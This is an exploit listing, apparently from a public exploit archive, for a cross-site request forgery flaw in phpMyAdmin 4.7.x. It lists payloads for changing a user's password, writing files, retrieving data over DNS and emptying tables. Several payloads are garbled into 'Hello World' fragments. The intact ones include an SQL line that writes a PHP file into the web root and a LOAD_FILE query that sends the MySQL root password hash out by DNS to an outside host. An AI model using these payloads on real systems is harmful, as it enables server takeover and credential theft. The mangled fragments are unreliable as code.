# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
# Date: 2018-08-28
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: Versions 4.7.x (prior to 4.7.7)
# Tested on: php7 mysql5
# CVE: CVE-2017-1000499
# Exploit CSRF - Modifying the password of current user
Hello World
)
# Exploit CSRF - Arbitrary File Write
Hello World
;?>' into outfile '/var/www/html/test.php';)
# Exploit CSRF - Data Retrieval over DNS
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
user='root' LIMIT 1),'.vulnspy.com\\test'));
# Exploit CSRF - Empty All Rows From All Tables
Hello World
